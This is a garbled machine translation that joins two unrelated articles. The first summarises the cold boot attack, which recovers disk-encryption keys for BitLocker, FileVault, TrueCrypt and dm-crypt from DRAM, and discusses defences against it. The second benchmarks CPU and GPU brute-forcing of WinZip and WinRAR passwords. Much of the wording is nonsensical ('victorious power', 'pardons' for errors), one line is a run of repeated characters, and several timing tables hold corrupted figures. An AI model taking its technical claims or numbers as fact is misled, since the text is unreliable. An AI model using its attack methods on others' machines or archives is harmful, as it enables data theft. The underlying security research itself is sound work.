Breaking encryption. Hacking the encryption systems of hard disks using the path of "cold re-engineering"

Researchers from Princeton University have shown a way to bypass the encryption of hard disks, which will allow the victorious power of the modules in the operational memory to store information for a short period of time after the delivery of life.

Peredmova

So, for access to an encrypted hard drive, you need a mother key, and vin, zrozumіlo, is stored in RAM - everything that is necessary, you need to take physical access to a PC for a few minutes. After reloading from the old hard drive or USB Flash, a new memory dump will be run and the data will be processed for a new access key.

This method allows you to retrieve the encryption keys (and new access to the hard drive), which are used by the BitLocker, FileVault and dm-crypt programs in Windows Vista, Mac OS X and Linux operating systems, as well as the popular TrueCrypt hard drive encryption system, which can be easily exploited .

The importance of this work is due to the fact that there is no simple method of defending against this evil method, including the inclusion of life for an hour sufficient for the complete erasure of these.

An initial demonstration of the process is presented in video clip.

Abstract

After a tired thought, DRAM memory, which is victorious in most modern computers, saves data after switching on the life for a few seconds, or it is quiet, moreover, it is used at room temperature and on a different motherboard. What time is enough to take a new dump of operational memory. We show that this phenomenon allows an attacker, who can have physical access to the system, bypass the OS functions to steal data about cryptographic keys. We show how re-advanced can be done in order to launch successful attacks on hard disk encryption systems, not specializing in hard drives, but materials. It is experimentally significant the steps and the savings of the excess magnetization and it is shown that the hour for which you can collect data, you can get a lot of money for the help of simple tricks. Also, new methods will be proposed for searching for cryptographic keys in memory dumps and correcting the pardons caused by the second battle. If it will also tell you how to change these risks, we don’t have a simple solution.

Entry

Most of the experts are similar to the fact that the data from the operational memory of the computer are erased practically after the inclusion of life, but they should be taken into account that the extra data in the region can be easily fluctuated without any special possession. We show that the qi are not correct. The primary DRAM memory spends data step by step for a few seconds, navіt at normal temperatures, and as a result, the memory chip will be removed from the motherboard, the data will be saved in a short period of time, or navіt year at low temperatures. Additional data can be supplemented by simpler methods, which require short-hour access to a computer.

We show a number of attacks, yaky, vikoristovuyuchi effects of excess magnetization DRAM, allow us to restore the encryption keys that are stored in memory. This is a real threat to hard disk laptops, which rely on hard disk encryption systems. Even if an intruder steals a laptop, at the moment, if the connection disk is encrypted, you can carry out one of our attacks to access the room, as well as block the laptop itself or be in sleep mode. We demonstrate, successfully attacking a few popular encryption systems, such as BitLocker, TrueCrypt and FileVault. Number of attacks may be successful and other encryption systems.

If we wanted to focus our efforts on hard disk encryption systems that have physical access to the attacker's computer, be it important information that is stored in operational memory, it can become an object for attack. Imovirno, and a lot of other security systems in conflict. For example, we found that Mac OS X was hiding passwords from cloud records in memory, we were able to recover them, so we ourselves attacked attacks on the removal of RSA private keys from the Apache web server.

Deyakі representatives spіlnot z іnformаtsiynoїї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї ї зійна ні зівінінії already knew about the effect of superfluous magnetization of DRAM, but there was little information about it. As a result, someone, who designs, develops or exploits security systems, is simply unknown to this phenomenon and how easily one can be victorious as an evil-doer. As far as we know, this is the first report of the robot, which weaves the traces of these phenomena for information security.

Attacks on encrypted disks

Encryption of hard disks is the only way to protect against data stealing. It’s very important to someone that the encryption systems of hard disks allow the data to be stolen, to induce a vipadka in that case, as the attacker has taken away physical access to the computer (weather for this stink and consumption, approx. ed.). The law of the state of California, adopted in 2002, needs to be aware of the possibility of disclosure of personal data, even more so, as the data were encrypted, because. it is important that the encryption of data is a sufficient zahid. Although the law does not describe any specific technical solutions, a lot of experts recommend victorious encryption systems for hard disks or distributions, which should be taken into account by sufficient means. The results of our research have shown that the encryption of disks is unprimed. Attacking, far from being the most qualified, you can get around a lot of widely used encryption systems, like a laptop with data of stealing, at that hour, if it’s turned on, or it was in sleep mode. Data on a laptop can be read in that case, if the stench is on an encrypted disk, then the encryption systems of hard disks are not sufficient for the world.

We scored a few of the attacks on hard drive encryption systems. It took the longest time to install the encrypted disks and verify the correctness of the revealed encryption keys. Taking away the image of operational memory and searching for keys, they took up only a small amount of fluff and were completely automated. Please note that the majority of hard drive encryption systems are capable of similar attacks.

bitlocker

BitLocker is a system that is included in the stock of current versions of Windows Vista. It functions as a driver that works between the file system and the hard disk driver, encrypting and decrypting on a selected sector. The keys that are victorious for encryption are kept in the operational memory until the next time the disk is encrypted.

To encrypt the skin sector of a BitLocker hard drive, it uses the same pair of keys created by the AES algorithm: the sector encryption key and the encryption key that works in encrypted block chaining (CBC) mode. There are two keys, at your own hand, encrypted with a master key. In order to encrypt the sector, the procedure of double addition of the open text with the session key is carried out, the encryption of the byte of the sector is encrypted with the sector encryption key. Then, otrimani data are processed by two functions, which are different, like breaking apart Microsoft's Elephant algorithm. These keyless functions are selected to increase the number of changes in the current bits of the cipher and, apparently, to increase the non-significance of the encrypted data of the sector. At the rest of the stage, the data is encrypted with the AES algorithm in CBC mode, with a different number of encryption keys. The initialization vector is designated as the encryption key of the byte used in the sector as the encryption key that is encrypted in the CBC mode.

We have implemented a fully automated demonstration attack, called BitUnlocker. In this case, the original USB disk with Linux OS is modified and modified on the basis of SYSLINUX and the FUSE driver, which allows connecting BitLocker encrypted disks in Linux OS. On the test computer running Windows Vista, live was turned on, the USB hard disk was connected, and the new drive was turned on. After that, BitUnlocker automatically dumped the RAM dump to the original disk, after the help of the keyfind program, searched for possible keys, tried all the other options (parrying the sector encryption key and the key to CBC mode), and with luck, enabling the encryption of the disk. As soon as the disk was connected, it was possible to work with it as if it were some other disk. On a daily laptop with 2 gigabytes of RAM, the process took about 25 minutes.

It is noteworthy that it became possible to carry out this attack without reverse-engineering of any kind of software. The Microsoft documentation describes the BitLocker system in sufficient detail to understand the role of the sector encryption key and the key to the CBC mode and create your own programs that implement the entire process.

The main feature of BitLocker in other software classes is the way to save keys when an encrypted disk is inserted. For locking, in basic mode, BitLocker protects the master key only for the additional TPM module, which is used on many modern PCs. The Danish way, which, perhaps, is widely victorious, especially infuriating before our attack, the shards of the wines allow you to take the keys of the encryption, to type the computer like a computer for a long time, the oscillators, if the PC is captured, the keys are automatically stored in the operational the logon window appears) without entering any authentication data.

Obviously, Microsoft's facsimiles are aware of this problem and recommend setting BitLocker in the reduced mode, decrypting the keys here, not only for the help of TPM, but also with a password or a key on the external USB port. But, in such a mode, the system is infuriating, as if the attacker denies physical access to the PC at that moment, if it works (you can get blocked or you can change it into sleep mode, ataci).

File Vault

Apple's FileVault system has been regularly upgraded and reverse engineered. Mac OS X 10.4 FileVault captures a 128-bit AES key in CBC mode. When the password is entered, the heading is decrypted, which will replace the AES key and another K2 key, which is used to decrypt the vector in initialization. The initialization vector for the first disk block is secured as HMAC-SHA1 K2(I).

We challenged our EFI program for retrieving RAM images for retrieving data from a Macintosh computer (which is based on an Intel processor) with an attached disk, encrypting FileVault. Since then the keyfind program has automatically known the FileVault AES keys.

Without the initialization vector, but with the AES key removed, it is possible to decrypt 4080 of 4096 bytes of the skin block of the disk (all of the first AES block). We messed up that the initial vector is also known to the dump. Assuming that the data did not catch up, the attacking vector can be identified, by trying the 160-bit rows in the dump and re-verifying that the stench can make the text possible, with the binary addition of the first decrypted block. Together, using programs like vilefault, the AES keys and the initialization vector allow you to re-encrypt the disk.

During the FileVault follow-up process, we found that Mac OS X 10.4 and 10.5 kept multiple copies of the password in memory, destined to attack. The passwords of cloud records are often hacked to protect the keys, which in turn can be hacked to protect the passphrases of encrypted FileVault disks.

TrueCrypt

TrueCrypt is a popular open-code encryption system that works on Windows, MacOS and Linux. It supports impersonal algorithms, including AES, Serpent and Twofish. In version 4, all algorithms worked like LRW; in the current 5th version, the stink vikoristovuyut XTS mode. TrueCrypt saves the encryption key and tweak the key at the header and spread it on the skin disk, which is encrypted with another key, which comes from the password, which is entered as a password.

We tested TrueCrypt 4.3a and 5.0a, which work under Linux OS. We connected the disk, encrypted with the help of a 256-bit AES key, then turned on the live and victorious to capture the firmware for the memory dump. In both cases, keyfind produced a 256-bit unencrypted encryption key. So, in TrueCrypt 5.0.a, keyfind was able to tweak the key to XTS mode.

To decrypt disks created by TrueCrypt 4, a tweak key is required for LRW mode. We have shown that the system takes it from two words before the key distribution of the AES key. Our dump, LRW, has no key. (At times pardons appeared, we could all restore the key).

Dm-crypt

The Linux kernel, starting from version 2.6, includes the dm-crypt subsystem, a disk encryption subsystem. Dm-crypt uses an anonymous algorithm and modes, ale, behind the lock, won't use a 128-bit AES cipher in CBC mode with initialization vectors not based on key information.

We tested the creations of dm-crypt by splitting the LUKS (Linux Unified Key Setup) cryptsetup utility and kernel 2.6.20. Encryption disk for help AES yak CBC. We temporarily turned on the live, vicorous modifications of PXE zavantazhuvach, made a memory dump. The keyfind program has found a correct 128-bit AES key, which can be updated without any pardons. Subsequently, the attacker can decrypt and add the keys to the distribution of dm-crypt encryptions, modifying the cryptsetup utility in such a way that it captures the keys in the required format.

Help zahist that їх obezhennya

The implementation of protection against attacks on the RAM is not trivial, the fragments of the cryptographic keys that are victorious must be taken away. We suggest focusing susilla on corrupted or attached keys before an attacker can take away physical access to the PC, preventing the ROM from running for a memory dump, physically stealing the OZP chips and, if possible, lowering the OZP of the data to save.

Memory Overwrite

Nasampered, it is required, if possible, to save keys from RAM. It is necessary to overwrite the key information, so that it won't be beaten anymore, and save data copy from the download file. The memory is to blame for being cleared by the OS or additional libraries. Naturally, don’t come in and don’t cheat the keys that are victorious at the moment, the stinks of the stench are saved in memory, for example, such keys are victorious for encrypted disks or on protected web servers.

So, the RAM is to be cleared in the process of capture. Deyakі PC can be set up in such a way to clear the RAM when you are interested in the additional cleansing request POST (Power-on Self-Test) before you start the OS. If an evil-doer is not able to protect this password, then on this PC, the new one will not be able to dump memory with important information. However, the new one still lacks the ability to hack the RAM chip and insert it into another PC with the necessary BIOS settings.

Foreign exchange from the fence or from the outside

A lot of our attacks were implemented with a lot of interest as much or as little as possible. The PC can be set in such a way that you can use the password of the administrator to gain access to your account. Ale, it is necessary to indicate that the system is set up to attack only from the main hard disk, the attacker can change the hard disk itself, or in different ways, throw off the NVRAM computer to download the BIOS.

Safe sleep mode

The results of the study showed that simply blocking the PC desktop (so that the OS continues to clean up, but in order to start with it, it is necessary to enter a password) does not protect the RAM. The sleep mode is not effective and in that case, as the PC is blocked when turned on from the sleep mode, the hackers can activate the turn from the sleep mode, after which the laptop is reconfigured and the memory dump is generated. The hibernate mode (internal RAM is copied to a hard drive) does not help itself, except for changing the key information on the wearers, which are familiar, to restore normal functioning.

In most systems, encryption of hard disks can be encrypted by PCs. (The Bitlocker system in the basic mode of the TPM module is overwhelmed, the hard drive will be connected automatically when the PC is enabled). Instead of memory, you can save a short period of time after switching on, it is recommended that you watch for your working station by stretching dekilkoh khvilin. Regardless of its efficiency, this zahid is very unhandy at the link with the trivial concerns of working stations.

Switching to the sleep mode can be secured in the following ways: change the password or another secret, to “wake up” the working station and encrypt it in memory with a key similar to your password. The password may be strong, so that the attacker can generate a memory dump and then try to guess the password by brute force. Since it is impossible to encrypt all the memories, it is necessary to encrypt only those areas in order to avenge the key information. The deyakі systems can be set up in such a way, so that you can go into such a type of stolen sleep mode, if you want to sound and not for locking.

Vіdmova vіd pperednіh calculus

Our investigations have shown that the number of advances was calculated in order to speed up cryptographic operations, to collect key information more effectively. The forward calculation is carried out to the point that in the memory there is transcendental information about the key data, which allows the evildoer to bring the keys to wind at different pardons. For example, as described in section 5, information about the iterative keys of the AES and DES algorithms is extremely over-the-top for an attacker.

Vіdmova vіd poserednіh raschetnіh znizâtіvnіst produktivnіst, oskіlki potenzіyno skolnіnі kolіchіnіa sudіdetsya repeat. But, for example, you can cash out for a long time to cancel the value for a song interval and erase the data taken away, so that the stench doesn’t win over the length of that interval. Such a change is a compromise between the security and productivity of the system.

Key extension

The best way to save the renewal of keys is to change the key information that is stored in memory, in such a way as to simplify the renewal of the key through different pardons. This method was considered in theory, de bula showed a function, a check until the opening, whose input data are overwhelmed by attachments, so that practically all input data were detected, which is even similar to the work of single-directed functions.

In practice, it should be noted that we have a 256-bit AES key K, which at the moment is not victorious, but you need it later. We cannot overwrite yoga, but we want to make yoga stable until it is renewed. One of the ways to reach it is to see the large B-bit area of ​​data, fill it with the falling data R, after which you keep in mind the result of the offensive transformation K + H (R) (dviykove subsuming, ed.), the hash function, for example, SHA-256.

Now to state that the electrician has been switched off, I have done before that d bit in this area will be changed. Like the hash function of the security, when trying to authenticate the key K, the attacker can only risk for those who can guess the fault, as the bits of area B were changed by about half, but they could be changed. If d were changed, the attacker might have to search the area by (B/2+d)/d in order to know the correct value of R and then later check the K key. small.

Theoretically, in such a way it is possible to save all the keys, opening the skin key, only if we need it, and removing it, if we don’t need wine. In this way, by stopping the description method, we can keep the keys in memory.

Physical zahist

Acts of our attacks were based on the availability of physical access to memory chips. Such attacks can defeat a physical memory attack. For example, memory modules are located in a closed PC case, or they are filled with epoxy glue, so as to protect the samples or access to them. So, it is possible to realize the erasure of the memory as a reaction of the weather to low temperatures, or try to open the case. This method will require the installation of sensors from an independent living system. A lot of such methods of dealing with equipment stolen from unauthorized devices (for example, the IBM 4758 processor) can greatly increase the versatility of the working station. From the other side, the memory of memory, soldered to the mother's payment, is much cheaper.

Change of architecture

You can change the computer architecture. What is impossible for a PC, what is already vikoristovuyutsya, then allow us to secure new ones.

The first idea is to design DRAM modules in such a way that the stench erases all data more quickly. It may not be easy, the shards of the most recent deletion of data, to supersede other marks, so that the data did not disappear between periods of renewal of memory.

The second step is to save key information in the supplementary equipment, as it would be guaranteed to remove all the information from its collections at the time of launch, restart and vice versa. In this rank, we take away an extra space for saving dekilkoh keys, wanting to be frivolous, we are tied up with the front charges.

Other experts have propagated the architecture, within the framework of which it is possible to encrypt it in memory. If, before that, you can implement the erasing of keys when rewiring and turning on the electrics, then there is a way to ensure sufficient protection for the types of attacks we have described.

Trust the calculation

Equipment that supports the concept of "trusted calculation", for example, in the case of TPM modules, is already victorious in some PCs. Regardless of its ability to defend against certain attacks, its lower form does not help to defeat the attacks we describe.

TPM modules do not implement external encryption. Natomist stench is guarded by the process of zavantazhennya to make a decision about those who can safely capture the key from RAM chi. If it is necessary for software to win a key, then it is possible to implement such a technology: a key, in a form that is attached to a twist, cannot be stored in RAM, the docking process cannot be passed after the capture script. Ale, as if only the key is in the operational memory - it will immediately become a target for our attacks. TPM modules can protect the key from being read into memory, but the stench does not prevent it from being read from memory.

Visnovki

Contrary to popular thought, DRAM modules from the switched on station will save data for a long time. Our experiments have shown that this phenomenon allows the implementation of a variety of classes of attacks, such as allowing the removal of important data, such as encryption keys from operational memory, regardless of how the OS tries to protect it. We have described the attacks implemented in a practical way, and our examples of attacks on popular encryption systems are justified.

Ale and іnshі see PZ so razzlivі. Digital rights ceremonial (DRM) systems often use symmetric keys, which are stored in memory, and can be retrieved using the methods described. As we have shown, web servers with SSL support can be smart, stink shards save the private keys from memory, which are necessary for creating SSL sessions. Our methods of searching for key information, more than anything else, will be effective for searching for passwords, numbers in the account and whether any other important information that is saved in the OZP.

It seems that there is no easy way to get rid of the knowledge of inconsistencies. Changing the PZ for everything will not be effective; hardware changes will help, but the timing and resource investment will be great; the technology of "trusted calculation" in today's form is so very little effective, the shards can't protect the keys that are in the memory.

In our opinion, laptops are the most risky, as they are often found in large areas and operate in different modes for these attacks. The presence of such risks shows that the encryption of disks is worth protecting important data from the lesser world, it is accepted to be respected.

As a result, it is possible to see the DRAM memory as not trusted by the current PC component and unify the processing of important confidential information in it. But for the time being, it’s not enough, the docks of the architecture of the current PCs will not change, in order to allow the PZ to save the keys in a safe place.

Entry

If you forget your keys in the car and automatically lock the doors, don't be ridiculous. Wake up, if you trapilos in one of our spivrobitnikov, you happened to spend most of the day, checking on the slyusar. Luckily, we can put you at ease: this person has had such a pardon more than once, and for a quiet feast, she doesn’t waste her keys.

Naytsіkavіshe, with all your knowledge and care, it's simply impossible to log in for your electronic keys (passwords), if you're using a computer. It's just that there's more data, even if it's not possible to win one password for all vipadkiv. Behind the great keys to the booth and the office, it's much easier to walk. Navit if the stench is ruined, the stench is all the same potim here perebuvayut. It’s just necessary to keep your path in order. Well, otherwise, in the extreme, viklikati fahivtsya (for example, a slyusar on the locks), which will help you fix the jump at the looking lock at the door.

Those are the same, if there are passwords on the right, accept them, until the singing moment. It doesn't matter, e-mail to the bank account - ring the password reset on the Internet - it's a clumsy process. As a rule, on the sites there is a message "Forgot Your Password?" ("Forgotten your password?") to allow you to regain access to your oblikovy record. However, when files are encrypted, the prospects sound less bright. We recently ran into this problem, trying to gain access to an old encrypted WinZip archive.

First of all, we zaglibimos at the end of the power of updating passwords, I would like to remember that there are a lot of ways to protect your data. If you need a complex solution, we can propagate you such a program, like TrueCrypt (marvel at the article "Secure your data! TrueCrypt 7.0a Productivity Analysis"); And yet, the encryption of the archives is blocked in the widest way to protect data. Chi is a worker in charge of work with the staff, who helps you pay bills, like a Hollywood actress, who helps you to protect yourself and protect your special photos on the iPhone, encrypting the archive for you is a great and easy way to protect.

Prote, іsnuyut razbіzhnostі іt, naskіlki good zashchenі your data. If you need to worry about the security of your information, then you, better for everything, are worthy of the strongest possible encryption programs. Imovirno, let's assume that the encryption is harder, the file is more collapsible, the encryption with the program is better, and the AES-256 encryption is shorter than AES-128. Ale tse zovsі so. Encrypt your own kind with a great safe. What comrade's walls, more folding in the new penetration. However, the protection of the safe is good on the floor, on the back of the lock, which protects it. So just die password. Tse key to hell. The better your password is, the more folding your lock is and the more your data is saved.

More koristuvachiv vvazhayut, scho eight-character passwords folded in order to hackers know the blows. But we don’t call it that way, and we choose to tell you why.

Test configuration

Test hardware
Processor Intel Core i5-2500K (Sandy Bridge), 3.3 GHz, LGA 1155, 6 MB hard L3 cache
Motherboard Asus P8P67 Deluxe
Memory Kingston Hyper-X 8 GB (2 x 4 GB) DDR3-1333 @ DDR3 1333 1.5V
hard drive Samsung 470256 GB
Video card Palit GeForce GTX 460 1 GB
Asus GeForce GTX 570 1.28 GB
AMD Radeon HD 5870 1 GB
Living block Seasonic 760 Watts, 80 PLUS
System firmware and drivers
Operating system Windows 7 Ultimate 64-bit OS
DirectX DirectX 11
Drivers NVIDIA 270.51
Catalyst 11.4
Software security
Version: 6.2
Version: 4.53
Accent Zip Password Recovery Version: 2.01
Accent RAR Password Recovery Version: 2.01
Parallel Password Recovery Version: 1.6.0
winzip Version: 15.5 Pro
Encryption: Zip 2.0 (for lock), AES-128, AES-256
Embossed: no embossed, Zipx/PPMd (for zip), Zip/deflate
WinRAR Version: x64 4.00
Encryption: AES-128
Shrinking: standard, saving

It is important that the WinZip program supports three different encryption options: Zip 2.0, AES-128 and AES-256, as well as some embossing schemes. WinRAR is much simpler for this plan: it uses less AES-128 encryption and different compression schemes. We protested different options to show you how stinky to add to the password security security.

Archive encryption: WinZip and WinRAR

Data in an encrypted file, for example, in WinZip or WinRAR archives, may be less secure, lower information on a fully encrypted storage device. That is why we are talking about different concepts.

Squeezing data - placing a file or a series of files in a container and accessing the downloaded information battles with a method of saving the memory area. You can make a difference just by copying the files in a sixteenth editor. Give respect to those who will be less constrained in the future.

Obviously, the idea behind a file container is one that allows you to encrypt a WinZip file. The container is not encrypted, but the axis is. This means that you do not need a password to save the archive. File names are not protected.

The WinRAR program exploits the very concept. And here you can encrypt file names. Tse it is possible to gain access to the entire container by way of the Zakhist. When you browse, you can't open the file because you don't have a password.

Filenames are part of the so-called metadata. The price of data about data and the price is the same characteristic of WinRAR as WinZip. The rest allows you to save the encrypted archive, the shards of the first can save the metadata.

One thing, of course, is not obov'yazykovo rob WinRAR more protected by the program. However, password hackers try hard to cheat metadata, the shards sound like unencrypted stench. Knowing the weak of the city, you can vikonate dii, scurrying shortly to the way of zastosuvanya encryption.

You don't have to worry too much as your password is foldable and you have a good encryption scheme (AES-128 or AES-256). At the same time, if you don’t want third parties to find out about those that you encrypted with WinZip for help, rather, type non-descriptive file names for such ones, like “2011 1040 Declaration of income”. Zvichaynno well, a strong zakhist vіdsіche offensive ways. If you make the file names unrecognizable, then you do not know what is in the encrypted file, the wine docks will not be decrypted again. Sound, as soon as the access is less lucrative, it is significant that for you it will become less lucrative.

So what will happen, if you, listening to our advance, "tighten the screws" on all your digital locks, and then forget, how will I open them again?

Forget passwords

Password recovery can be a collapsible process. Encryption can be matched with the Sudoku puzzle. The bigger and more confusing the puzzle, the more complicated it is to get around the encryption scheme. There are two ways to try it out.

Ring out at the first hour of the first hackers try to find out what the big law is. This way can be divided into a few different classes of attacks, about the deuces of them you can, perhaps, chuli in the news, for example, such as an attack through third-party channels. These methods of folding are not quiet, with which the zvichayterny koristuvachs are corrugated. There is only a small group of people who are stagnant and stagnant.

Nabagato primitive pidkhid to bypass encryption - just "tell and twist". This method is known as a way to select. Show that you are pointing a skin single combination of numbers, as you can win for the solution of the guessed puzzle "Sudoku", starting with winning the singles in all directions and ending with all the nines. Іsnuyut ways, yakі allow prihovat "perevіrka" so that the attack became folded. But such simple programs, like WinZip and WinRAR, do not suffer such a thing. If you are easy, you can continue guessing passwords until the cancer is on the mountain. There are not many options, which you can ask before rechecking. In this way, the correct problem with the power supply of the password reset is correct for the security, so you can guess the correct option.

I will manually change the passwords - for the shortest time, without a clue, especially if you can do it right with a long password. Axis here and enter the scene of the password recovery program. They automate the process of "guessing" passwords.

Available symbols from the english alphabet Possible passwords from two characters Possible passwords from some symbols Possible passwords from six characters
Ryadkovi letters 676 456 976 308 915 776
Ordinary and great letters 2 704 7 311 616 19 770 609 664
Ryadkovі, great letters and numbers 3 844 14 776 336 56 800 235 584
Mustache ASCII characters 8 836 78 074 896 689 869 781 056

Attacks with a path to increase chances. The lower the password, the more passwords for verification. Here the idea of ​​permutation is suggested, so that the objects are arranged in order. Show that passwords are anagrams. How do I give you the letters a, b and c, how many different ordering permutations can you work out? With three letters, you can make six permutations to the set (a, b, c), and to itself: , , , , i .

Calculate the number of possible passwords easily. Repetitions are allowed, so the formula will be: n(password length), where n is the number of possible characters. Like a bachite, with six characters, we can already have billions of options on the right, as small and great letters are included in the password. If you have also chosen a special number symbol (these symbols are ASCII (American Standard Code for Information Interchange - American Standard Code for Information Interchange)), then show how many passwords-"candidates" have sharply increased to? trillion (10 of the 12th degree). And don't forget that you don't know your password yet, then you must try all possible combinations, starting from the password in one character, until you get to the password you chose.

Understand what we want?

Password cracking: CPU-based encryption

There are anonymous programs that you can choose to help you recover passwords, and the two most popular are called Advanced Archive Password Recovery and Visual Zip Password Recovery Processor. If we have entered the password up to some of the WinZip-files, then we could ask the right first program, for example, for 20 credits. The ale gave us a hedge to think about and inflamed our cuckoo. What kind of security does our computer use to steal passwords? What would happen if we won the strongest encryption method, such as AES-128?

Even more important is the next power: why not to open all our password-protected archives, we need only 20 minutes, and then we will deny access to them, who is not guilty of removing it?



Speed ​​of direct selection of passwords, passwords per second Advanced Archive Password Recovery Visual Zip Password Recovery Processor
Squeeze: none
Encryption: Zip 2.0
28 357 311 20 943 157
Squeeze: none
Encryption: AES-128
9 715 bad luck
Squeeze: none
Encryption: AES-256
9 713 bad luck
Embossing: Zip
Encryption: Zip 2.0
28 492 733 20 888 938
Embossing: Zip
Encryption: AES-128
9 733 bad luck
Embossing: Zip
Encryption: AES-256
9 760 bad luck
Embossing: RAR-hodgepodge
Encryption: AES-128
213 -
Embossing: RAR-hodgepodge
202 -
Embossing: RAR is standard
Encryption: AES-128
213 -
Embossing: RAR is standard
Encryption: AES-128, name the file
202 -

Like a bachite, the squeezing is more than a little world embedding on the security, so you can try to pick passwords, but the most vada is used in the old Zip 2.0 encryption scheme. As a result, a five-character password can be learned in less than a few seconds, so you can process data with a speed of about 28 million passwords per second, using the Core i5-2500K processor. Visual Zip also revealed the correct password behind the Zip 2.0 encryption method, but due to software security issues, the utility was unable to recover the password for a file encrypted with the help of AES-128.

Without a doubt, it's not the whole story. We shouldn't be bullied by CPU performance just to brag that a new CPU can be built (though that could actually lead us to a benchmark test). This is why we know about the productivity of the CPU through those that are influencing the speed, so we can know the password.

Scorching hour for picking up, as well as wine and security 28 million passwords / sec. Passwords of 1 to 4 characters Passwords 1 to 6 characters Passwords 1 to 8 characters Passwords of 1 to 12 characters
Ryadkovi letters Mittevo 11 seconds 2 years old 112 rock
Ordinary and great letters Mittevo 12 hwilin 22 days 451 345 years
Mustache ASCII characters 3 seconds 7 years 8 years 701 193 345 years

Let's face it, if you can try 28 million passwords per second, then your chances of guessing the correct password will be more and more incomprehensible, if you proceed to more and more passwords and character sets. Spend a whole month on those who would break the password of eight characters, with all the same letters, - this is not such a stingy prospect, as the information is really important. Ale 700 million years - tse, wait a minute, this is a big figure, so that the checks will frighten you.

Luckily, the Advanced Archive Password Recovery program allows you to start the process and save the position if the search breaks. And if you have a small amount of home computers in your order, you can significantly reduce the hour of the joke by arranging the work between them. Are you afraid?

Password cracking: GPGPU technology


Password cracking: CPU i5-2500K.

Meta attack by brute-force method - quickly sort out the maximum number of passwords. But the current CPU is not good enough optimized for others. At that hour, since our working station on the Sandy Bridge architecture can process close to 28 million passwords per second, it still doesn’t beat all the available CPU cycles. Guess, aje mi tіlki vaguely and perveryaemo. Hovering over the screen icon with data about how the central processor is illustrating: even though the clock frequency, obviously, helps in this process, the program is able to speed up the paralysis, so the presence of a large number of cores will help speed up the process of finding a password.

As we know, if from the right to reach parallel running tasks, which sometimes the central processors can’t cope with, then the arithmetic-logical extensions on the video card could be more efficient and shorter. AMD and Nvidia have a number of groups involved in video transcoding, the participants of which are involved in this, Intel did not finish the docks, which a few specialized logical circuits in the Sandy Bridge architecture can greatly outperform the great graphics processor. And now it turns out that we have one more add-on, which is a wonderful fit for robots on modern GPUs.

For an hour, if the cracking of passwords for the help of GPGPU technology (General-purpose graphics processing units - the calculation of a secret recognition on the GPU) did not go beyond the scientific world: graduate students reported great efforts for robots with special programs, even though they did not know the commercial blocking . But now everything has changed. There are two GPGPU utilities currently being developed that you can buy, whether you have a credit card: Parallel Password Recovery and Accent Password Recovery.

Parallel Password Recovery is a program that is fully optimized for architecture with parallel Nvidia CUDA calculations. We are not talking about those CUDA cores that are shorter than AMD Stream. However, next to Nvidia. Її "invasion" into the area of ​​charging a secret plan for an additional graphics processor began to be done a long time ago and the company gave retailers access to numerical libraries of a low level, necessary for the development of this technology. AMD has made a big difference in the future. In fact, we still run into some sort of problems when stunting the Stream, which is included before popular programs for transcoding. Tse often explains why another solution, Accent Password Recovery, still shirks at Nvidia's backlog. Although the utility recognizes CUDA and Stream, only Nvidia's hardware security is optimized in order to be able to infiltrate files from Zip 2.0 encryption.

The evil of the GeForce GTX 460 video card
Parallel Password Recovery Accent Password Recovery
Embossing: Zip
Encryption: Zip 2.0
24 111 280 516 096 000
Embossing: Zip
Encryption: AES-128
185 072 166 800
Embossing: Zip
Encryption: AES-256
185 177 156 138
Embossing: RAR is standard
Encryption: AES-128
3 493 4 231

I, before speech, for the security of Zip 2.0 encryption! With a GeForce GTX 460 video card, we can already pick up passwords with a speed of about 500 million combinations per second. So you more clearly stated what it means, let's say, what we can choose, whether it be from possible combinations of ASCII characters for a password, more than one to 7 characters less, lower for 48 years. If you need a password of eight characters, then it will be about 168 days.

Video card GeForce GTX 460
Direct password picking, all ASCII characters, hot picking hour
Yakshcho pіdbir ide zі shvidkіstyu 180.000 passwords per second. 50 days, 20 years 1 284 years, 79 days
Yakshcho pіdbir ide zі shvidkіstyu 24 million passwords per second. 9 years, 9 days 9 years, 230 days
Yakshcho pіdbir go zі shvidkіstyu 500 million passwords per second. 26 whilin, 21 seconds 168 days, 17 years

Zip 2.0 is an older encryption algorithm. The WinZip program supports more than just mirkuvan summancy. The AES standard is the axis of the new "leader", up to which everything should be pragmatic. Qiu scheme is richer folded more vikoristovuvaty at parallel zavdannyah, wanting the retailers of the PZ, obviously, try to slacken like that.

Productivity suffers especially strongly if we start to recover the password, encrypting it from the blocked AES code. The mouse cursor in our test system literally began to "spot". Attacks on files with AES-encryption by means of a pick-and-place method are carried out correctly. In order to try all possible combinations of ASCII characters for a password with a maximum of 1 to 7 characters, you need at least 13 characters.

2 x GeForce GTX 570 SLI
Direct pickup of passwords, passwords per second Parallel Password Recovery Accent Password Recovery
Embossing: Zip
Encryption: Zip 2.0
45 412 290 1 492 279 088
Embossing: Zip
Encryption: AES-128
495 133 513 936
Embossing: Zip
Encryption: AES-256
496 244 513 880
Embossing: RAR is standard
Encryption: AES-128
13 904 14 605

Calculation of the unfortunate plan for the help of the GPU is associated with a phenomenon of parallelism and the fact that some of you have 480 CUDA cores on the video card work well, then if you combine the cores from two cards, the value of 960 is taken, like, maybe, richly better, not so chi?

When we combine two GeForce GTX 570 video cards and enable SLI, Zip 2.0 encryption is no longer necessary. With the help of optimized code, we can check 1.5 billion passwords per second. Tse daetsya navit trohi absurd. Now we have shortened an hour of searching for passwords for the password of one to eight characters from the search for the required ASCII characters for up to two months.

Tim for an hour, the AES zahist still looks like we'll get it right. If the password is composed of over seven characters, then it may take five years to complete, presenting combinations of 500,000 passwords per second.

Nvidia vs AMD: the effectiveness of a brute-force attack

This little butt of po'yazany іz scaling. Do you want a mother with a lot of cores and do you want a stench to pratsyuvali? Let's look at those who are responsible for our results, let's take a look at the architecture's nourishment. Just like two GeForce GTX 570 graphics cards may be less than 2.8x the number of CUDA cores in one GTX 460, we took away productivity three times, the rest of the cores of productive graphics cards also work 8% faster.

As for the GeForce GTX 590, we took similar results on the SLI configuration. There are 590 more cores on the video card, but the stench works a little more. If you need a first-class video card, then Nvidia's success is richly remembered, and the list of the best models with 1024 CUDA cores. At the same time, in order to be able to accept high heating and a great addition to varth, two GeForce GTX 590s with SLI configuration will double the productivity of two GTX 570s.

To match: $3072 for Stream processors, which runs at 830 MHz on AMD's shortest graphics card, the Radeon HD 6990. Don't forget that AMD's core is not similar to Nvidia's core, so we can't compare between them, like 1:1.

